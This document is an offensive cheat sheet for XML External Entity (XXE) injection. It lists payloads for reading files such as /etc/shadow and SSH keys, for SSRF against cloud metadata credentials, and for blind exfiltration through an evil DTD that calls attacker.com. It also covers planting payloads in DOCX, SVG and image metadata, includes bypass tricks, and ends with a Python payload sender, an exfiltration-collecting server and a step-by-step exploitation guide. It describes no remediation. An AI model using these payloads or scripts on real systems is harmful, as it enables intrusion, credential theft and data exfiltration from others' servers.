XML External Entity (XXE) Injection

XXE attacks exploit XML parsers that process external entity references. This can lead to file disclosure, server-side request forgery, denial of service, and in some cases remote code execution.

Information

XXE vulnerabilities are common in legacy applications, SOAP services, and anywhere XML parsing occurs (file uploads, API endpoints, configuration processing).

🎯 Why XXE Remains a Critical Threat

Despite being well known, XXE still causes serious breaches. It had its own category (A4) in the OWASP Top 10 2017 and is covered by A05 Security Misconfiguration in the 2021 edition:

  • SAML Authentication: XXE in a SAML parser is reachable on the SSO endpoint itself, typically before the user has authenticated, so a single flaw can expose every application behind that login. Major identity providers have been vulnerable.
  • Office Documents: DOCX, XLSX, PPTX are ZIP files containing XML. Upload features processing these files are often vulnerable to XXE.
  • API Endpoints: Many APIs accept XML alongside JSON. Content-Type switching (JSON to XML) often reveals XXE in APIs thought to be JSON-only.
  • Supply Chain Risk: Many XML parsing libraries resolve external entities by default, or did so in older versions. Applications inherit the vulnerability from their dependencies.
  • Blind XXE Impact: Even without direct output, attackers can exfiltrate data via out-of-band (OOB) channels (DNS, HTTP) or achieve SSRF to internal services.
  • DoS Potential: The Billion Laughs attack nests entity definitions so that a payload under 1 KB expands to roughly 3 GB, which can exhaust memory on parsers without expansion limits.
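
The Billion Laughs numbers follow from simple arithmetic. The sketch below uses two hypothetical helpers, `build_nested_entities` and `expanded_size`, to build the classic ten-level nesting as a string and compare the bytes sent with the characters a parser without expansion limits would have to produce. It never parses the document.

```python
def build_nested_entities(levels: int = 10, fanout: int = 10, seed: str = "lol") -> str:
    """Return a document whose entity N references entity N-1 `fanout` times."""
    lines = ['<?xml version="1.0"?>', "<!DOCTYPE lolz [", f'  <!ENTITY lol0 "{seed}">']
    for i in range(1, levels):
        refs = f"&lol{i - 1};" * fanout
        lines.append(f'  <!ENTITY lol{i} "{refs}">')
    lines += ["]>", f"<lolz>&lol{levels - 1};</lolz>"]
    return "\n".join(lines)


def expanded_size(levels: int = 10, fanout: int = 10, seed: str = "lol") -> int:
    """Characters produced when the top-level entity is fully expanded."""
    return len(seed) * fanout ** (levels - 1)


if __name__ == "__main__":
    payload = build_nested_entities()
    print(f"payload size : {len(payload)} bytes")
    print(f"expanded size: {expanded_size():,} characters")
```

With the defaults, the payload stays under 1 KB while the expansion is 3,000,000,000 characters.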

Tools & Resources

  • XXEinjector: Automated XXE exploitation with OOB support. Run with: ruby XXEinjector.rb
  • oxml_xxe: Embed XXE in Office Open XML files (DOCX, XLSX). Run with: python oxml_xxe.py
  • docem: Create malicious Office/OpenDocument files. Run with: python docem.py
  • Burp Collaborator: Detect blind XXE via OOB DNS/HTTP. Part of Burp Suite Pro.
  • interactsh: Free OOB server for blind XXE detection. Install with: go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
  • svg-xxe: XXE via SVG image upload. Payloads are crafted manually.

Understanding XXE

XML allows defining entities (like variables) that can reference external resources. When parsers resolve these external references, attackers can read files, make network requests, or cause denial of service.

Basic XML Entity Syntax

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe "Hello World">
]>
<foo>&xxe;</foo>

<!-- Output: Hello World -->

<!-- External entity (reads file) -->
<!ENTITY xxe SYSTEM "file:///etc/passwd">

<!-- Parameter entity (used in DTD) -->
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
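
To watch a parser expand an internal entity, the following sketch feeds the first document above to Python's standard library `xml.etree.ElementTree`, which expands entities declared in the internal DTD subset. It deliberately uses only the harmless internal entity; how a parser treats SYSTEM entities varies by library and version, so that case is not shown. The helper name `expand_internal_entity` is made up for this example.

```python
import xml.etree.ElementTree as ET

DOC = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe "Hello World">
]>
<foo>&xxe;</foo>"""


def expand_internal_entity(document: str) -> str:
    """Parse the document and return the root element's text after entity expansion."""
    root = ET.fromstring(document)
    return root.text or ""


if __name__ == "__main__":
    print(expand_internal_entity(DOC))
```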

Where to Find XXE

  • SOAP/XML web services
  • File uploads (SVG, DOCX, XLSX, XML)
  • RSS/Atom feed parsers
  • Configuration file processing
  • SAML authentication (XML-based)
  • PDF generators with XML input

File Disclosure

Basic File Read

xml
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

<!-- Windows files -->
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
<!ENTITY xxe SYSTEM "file:///c:/windows/system32/drivers/etc/hosts">

<!-- Common targets -->
<!ENTITY xxe SYSTEM "file:///etc/shadow">
<!ENTITY xxe SYSTEM "file:///etc/hosts">
<!ENTITY xxe SYSTEM "file:///proc/self/environ">
<!ENTITY xxe SYSTEM "file:///home/user/.ssh/id_rsa">
<!ENTITY xxe SYSTEM "file:///var/www/html/config.php">

PHP Wrapper for Base64

xml
<?xml version="1.0"?>
<!-- Use PHP filter to base64 encode (avoids XML parsing issues) -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<foo>&xxe;</foo>

<!-- Read PHP source code -->
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=config.php">
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">
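
The base64 output usually comes back wrapped in whatever markup the application returns, so it has to be located before it can be decoded. The sketch below is a heuristic, not a definitive extractor: the helper name `decode_base64_blobs` and the 16-character minimum run length are assumptions chosen for illustration, and long alphanumeric words in a response can produce false candidates.

```python
import base64
import re

# Runs of base64 characters at least this long are treated as candidate blobs
MIN_BLOB_LENGTH = 16
BLOB_PATTERN = re.compile(r"[A-Za-z0-9+/]{%d,}={0,2}" % MIN_BLOB_LENGTH)


def decode_base64_blobs(response_text: str) -> list[str]:
    """Return every base64 run in the response that decodes to UTF-8 text."""
    decoded = []
    for blob in BLOB_PATTERN.findall(response_text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8"))
        except ValueError:
            # Wrong padding, or bytes that are not valid UTF-8: skip this candidate
            continue
    return decoded
```

Calling `decode_base64_blobs(response.text)` on a response to the payload above returns the decoded file contents if the entity was resolved.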

Directory Listing (Java)

xml
<?xml version="1.0"?>
<!-- Java allows directory listing with file: protocol -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/">
]>
<foo>&xxe;</foo>

<!-- Will list contents of /etc/ directory -->

SSRF via XXE

xml
<?xml version="1.0"?>
<!-- Access internal services -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://internal-service/admin">
]>
<foo>&xxe;</foo>

<!-- Cloud metadata -->
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

<!-- Port scanning -->
<!ENTITY xxe SYSTEM "http://192.168.1.1:22/">
<!ENTITY xxe SYSTEM "http://192.168.1.1:3306/">

Blind XXE

When entity values aren't reflected in the response, use out-of-band techniques to exfiltrate data.

Out-of-Band Detection

xml
<?xml version="1.0"?>
<!-- Trigger HTTP callback to confirm XXE -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://YOUR-ID.burpcollaborator.net/xxe-test">
]>
<foo>&xxe;</foo>

<!-- DNS callback: the hostname lookup is logged even if outbound HTTP is blocked -->
<!ENTITY xxe SYSTEM "http://YOUR-ID.oast.fun/">

Blind XXE with Parameter Entities

xml
<?xml version="1.0"?>
<!-- Malicious payload to send to target -->
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<foo>test</foo>

<!-- evil.dtd hosted on attacker server -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;

Data Exfiltration via Error Messages

xml
<?xml version="1.0"?>
<!-- Trigger error containing file contents -->
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<foo>test</foo>

<!-- evil.dtd - causes error with file contents -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

<!-- Error message will contain file contents -->

XXE via File Uploads

SVG Files

xml
<?xml version="1.0" standalone="yes"?>
<!-- malicious.svg -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

DOCX/XLSX Files

bash
# DOCX/XLSX are ZIP archives containing XML files
# Inject XXE into: [Content_Types].xml, word/document.xml, xl/workbook.xml

# Create malicious DOCX:
1. Create normal .docx file
2. Unzip: unzip document.docx -d extracted/
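3. Inject the DOCTYPE below into word/document.xml, directly after the XML declaration,
   and reference &xxe; somewhere in the document body so the parser resolves it: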

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://attacker.com/?xxe">
]>

4. Rezip from inside the folder so archive paths stay relative: cd extracted && zip -r ../malicious.docx .
5. Upload the file
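
Before choosing where to inject, it helps to see which XML parts a given document actually contains. The sketch below lists them with Python's standard `zipfile` module; the helper name `list_xml_parts` is hypothetical, and treating `.rels` files as XML parts is a choice made for this example (they are XML, though whether the target parses them is not known in advance).

```python
import zipfile
from typing import BinaryIO, Union


def list_xml_parts(docx: Union[str, BinaryIO]) -> list[str]:
    """Return the names of XML-bearing parts inside an OOXML (DOCX/XLSX/PPTX) archive."""
    with zipfile.ZipFile(docx) as archive:
        return sorted(
            name for name in archive.namelist()
            if name.endswith((".xml", ".rels"))
        )
```

For example, `list_xml_parts("document.docx")` returns the candidate files for step 3, such as `[Content_Types].xml` and `word/document.xml`.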

XMP Metadata in Images

bash
# Inject XXE into image XMP metadata
exiftool -XMP-x:XXE='<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/">]>' image.jpg

# Or create XML file with malicious XMP
<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<x:xmpmeta>&xxe;</x:xmpmeta>
<?xpacket end="w"?>

XXE in SAML

xml
<?xml version="1.0"?>
<!-- SAML Response with XXE -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
  <saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
    <saml:Subject>
      <saml:NameID>&xxe;</saml:NameID>
    </saml:Subject>
  </saml:Assertion>
</samlp:Response>

<!-- Intercept SAML response in Burp and inject XXE -->
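
In the HTTP-POST binding, the SAMLResponse form field is the base64 encoding of the XML document, so an intercepted value has to be decoded before it can be edited and re-encoded afterwards. A minimal sketch of that round trip follows, with hypothetical helper names. It assumes the POST binding (the Redirect binding additionally DEFLATE-compresses the message) and that any URL-encoding of the form field has already been removed.

```python
import base64


def decode_saml_response(form_value: str) -> str:
    """Decode a SAMLResponse form field (HTTP-POST binding) into its XML text."""
    return base64.b64decode(form_value).decode("utf-8")


def encode_saml_response(xml_text: str) -> str:
    """Encode edited XML back into the form-field representation."""
    return base64.b64encode(xml_text.encode("utf-8")).decode("ascii")
```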

Bypass Techniques

When ENTITY is Blocked

xml
<!-- Use XInclude instead -->
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

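<!-- Character-reference encoding (spec-conforming parsers do not decode references inside a SYSTEM identifier, so this only works on lenient parsers) -->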
<!ENTITY xxe SYSTEM "file&#x3a;///etc/passwd">

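<!-- UTF-7 encoding (only works if the parser supports UTF-7; declare it in the prolog) -->
<?xml version="1.0" encoding="UTF-7"?>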
+ADw-!DOCTYPE foo +AFs-
  +ADw-!ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI-+AD4-
+AF0-+AD4-
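
The `+ADw-` style sequences are UTF-7 escapes for characters such as `<` and `[`. Python's built-in `utf-7` codec can decode them, which is a quick way to check what an encoded payload really contains. The sketch below decodes the fragment above; the helper name `decode_utf7` is made up for this example.

```python
ENCODED = (
    b"+ADw-!DOCTYPE foo +AFs-\n"
    b"  +ADw-!ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI-+AD4-\n"
    b"+AF0-+AD4-"
)


def decode_utf7(payload: bytes) -> str:
    """Decode a UTF-7 byte string into ordinary text."""
    return payload.decode("utf-7")


if __name__ == "__main__":
    print(decode_utf7(ENCODED))
```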

Alternative Protocols

text
<!-- Various protocols that may work -->
file:///etc/passwd
http://attacker.com/
https://attacker.com/
ftp://attacker.com/file.txt
gopher://attacker.com:6379/_*1%0d%0a  (older Java versions)
jar:http://attacker.com/evil.jar!/evil.txt  (Java)
netdoc:///etc/passwd  (Java)
php://filter/convert.base64-encode/resource=/etc/passwd  (PHP)
expect://id  (PHP expect module)

Automation Scripts

Python - XXE Tester

python
#!/usr/bin/env python3
"""
XXE Vulnerability Tester
Tests for XXE with various payloads
"""
import base64
import sys

import requests

def generate_xxe_payloads(file_path="/etc/passwd", callback_url=None):
    """Generate XXE test payloads"""
    payloads = []
    
    # Basic file read
    payloads.append(f'''<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file://{file_path}">]>
<foo>&xxe;</foo>''')
    
    # PHP base64 wrapper
    payloads.append(f'''<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource={file_path}">]>
<foo>&xxe;</foo>''')
    
    # With callback for blind XXE
    if callback_url:
        payloads.append(f'''<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{callback_url}">]>
<foo>&xxe;</foo>''')
    
    # XInclude
    payloads.append(f'''<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file://{file_path}"/>
</foo>''')
    
    return payloads

def test_xxe(url, payloads, content_type="application/xml"):
    """Send XXE payloads to target"""
    results = []
    
    for i, payload in enumerate(payloads):
        try:
            response = requests.post(
                url,
                data=payload,
                headers={"Content-Type": content_type},
                timeout=10
            )
            
            # Check for file content indicators
            indicators = ["root:", "bin/bash", "[extensions]", "daemon:"]
            
            for indicator in indicators:
                if indicator in response.text:
                    print(f"[+] XXE VULNERABLE! Payload #{i+1}")
                    results.append({
                        "payload": payload,
                        "response": response.text[:500]
                    })
                    break
            
            # Check for base64 encoded content
            try:
                decoded = base64.b64decode(response.text.strip()).decode()
                if any(ind in decoded for ind in indicators):
                    print(f"[+] XXE VULNERABLE (Base64)! Payload #{i+1}")
                    print(f"    Decoded: {decoded[:200]}")
                    results.append({
                        "payload": payload,
                        "response_decoded": decoded[:500]
                    })
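            except ValueError:
                # Body is not base64 or does not decode to text
                # (binascii.Error and UnicodeDecodeError are ValueError subclasses)
                pass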
                
        except Exception as e:
            print(f"[-] Payload #{i+1} error: {e}")
    
    return results

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <url> [file_path] [callback_url]")
        print(f"Example: {sys.argv[0]} http://target.com/api/xml /etc/passwd")
        sys.exit(1)
    
    url = sys.argv[1]
    file_path = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd"
    callback = sys.argv[3] if len(sys.argv) > 3 else None
    
    print(f"[*] Testing XXE on {url}")
    payloads = generate_xxe_payloads(file_path, callback)
    results = test_xxe(url, payloads)
    
    if results:
        print(f"\n[+] Found {len(results)} successful XXE injection(s)")
    else:
        print("\n[-] No XXE vulnerability detected (try blind XXE with callback)")

Blind XXE Server (Python)

python
#!/usr/bin/env python3
"""
Blind XXE OOB Server
Hosts malicious DTD and receives exfiltrated data
"""
from http.server import HTTPServer, BaseHTTPRequestHandler
import sys
from urllib.parse import urlparse, parse_qs, unquote

class XXEHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        parsed = urlparse(self.path)
        
        # Serve malicious DTD
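        if parsed.path == "/evil.dtd":
            # Point the callback at the host and port the target used to reach
            # this server, so a non-default port does not break exfiltration
            host = self.headers.get("Host", f"ATTACKER_IP:{self.server.server_port}")
            dtd = f'''<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://{host}/exfil?data=%file;'>">
%eval;
%exfil;'''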
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.end_headers()
            self.wfile.write(dtd.encode())
            print(f"[*] Served DTD to {self.client_address[0]}")
        
        # Receive exfiltrated data
        elif parsed.path.startswith("/exfil"):
            params = parse_qs(parsed.query)
            if 'data' in params:
                data = params['data'][0]  # parse_qs already URL-decodes values
                print(f"\n[+] EXFILTRATED DATA:\n{data}")
            self.send_response(200)
            self.end_headers()
        
        else:
            print(f"[*] Request from {self.client_address[0]}: {self.path}")
            self.send_response(200)
            self.end_headers()
    
    def log_message(self, format, *args):
        pass  # Suppress default logging

if __name__ == "__main__":
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 8888
    server = HTTPServer(('0.0.0.0', port), XXEHandler)
    print(f"[*] XXE OOB Server running on port {port}")
    print(f"[*] DTD URL: http://YOUR_IP:{port}/evil.dtd")
    print(f"\n[*] Send this payload to target:")
    print(f'''<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://YOUR_IP:{port}/evil.dtd">%xxe;]>
<foo>test</foo>''')
    server.serve_forever()

XXE Testing Checklist

🔍 Discovery Phase

  • ☐ Identify XML-accepting endpoints (Content-Type: application/xml)
  • ☐ Test file upload for Office docs (DOCX, XLSX, PPTX)
  • ☐ Test SVG image upload functionality
  • ☐ Check SOAP/WSDL services
  • ☐ Look for SAML authentication
  • ☐ Try Content-Type switch (JSON to XML)
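
For the Content-Type switch, the JSON body has to be re-expressed as XML before it is resent with `Content-Type: application/xml`. How a given framework maps JSON keys to elements is an assumption here: the sketch uses a hypothetical `json_to_xml` helper, a root element named `root`, and one child element per key, which is a common convention but not a universal one.

```python
import json
import xml.etree.ElementTree as ET


def _append(parent: ET.Element, key: str, value) -> None:
    """Append `value` under `parent` as an element named `key`."""
    if isinstance(value, list):
        # Repeat the element once per list item
        for item in value:
            _append(parent, key, item)
        return
    child = ET.SubElement(parent, key)
    if isinstance(value, dict):
        for sub_key, sub_value in value.items():
            _append(child, sub_key, sub_value)
    elif value is not None:
        child.text = str(value)


def json_to_xml(json_body: str, root_name: str = "root") -> str:
    """Convert a JSON object (top-level dict) into an XML document string."""
    data = json.loads(json_body)
    root = ET.Element(root_name)
    for key, value in data.items():
        _append(root, key, value)
    return ET.tostring(root, encoding="unicode")
```

If the endpoint accepts the converted body, a DOCTYPE with a test entity can then be placed in front of the root element.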

📂 File Disclosure

  • ☐ Test basic file:// protocol
  • ☐ Try PHP wrappers (php://filter/convert.base64-encode)
  • ☐ Test for directory listing (Java)
  • ☐ Read common sensitive files (/etc/passwd, config files)
  • ☐ Try Windows paths (c:/windows/win.ini)
  • ☐ Check for source code disclosure

🔗 Blind XXE / OOB

  • ☐ Test parameter entities with external DTD
  • ☐ Set up OOB server (interactsh/Burp Collaborator)
  • ☐ Try DNS exfiltration
  • ☐ Test HTTP-based exfiltration
  • ☐ Check error-based XXE (entity error messages)
  • ☐ Try FTP exfiltration channel

⚡ Advanced Attacks

  • ☐ Test SSRF via XXE (internal services, cloud metadata)
  • ☐ Try billion laughs DoS (carefully!)
  • ☐ Test XInclude injection
  • ☐ Check for RCE via expect:// (PHP)
  • ☐ Test local DTD file inclusion
  • ☐ Examine entity encoding bypass

How to Exploit XXE

Step-by-Step Exploitation

  1. Find XML Input: Look for endpoints accepting XML, file uploads (SVG, DOCX), or try Content-Type switching from JSON to XML.
  2. Test Basic Entity: First confirm that entity processing works by declaring an internal entity, <!ENTITY test "Hello">, and referencing it with &test;
  3. Try External Entity: If entities work, try <!ENTITY xxe SYSTEM "file:///etc/passwd"> - look for file contents in response.
  4. Blind Detection: If no output, use external DTD with OOB: <!ENTITY % xxe SYSTEM "http://your-server/evil.dtd">%xxe;
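  5. Data Exfiltration: Host an evil.dtd that loads the target file into a parameter entity (<!ENTITY % data SYSTEM "file:///etc/passwd">), then defines a second entity whose URL embeds %data; and points at your server, so the file contents arrive in the DNS lookup or HTTP request.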
  6. SSRF Pivot: Use XXE to access internal services: <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
  7. Escalate: Try reading SSH keys, config files with credentials, or accessing internal admin panels via SSRF.

💡 Pro Tip: If file contents break XML parsing (characters such as < and &), use the PHP filter wrapper on PHP targets to base64 encode them: php://filter/convert.base64-encode/resource=/etc/passwd
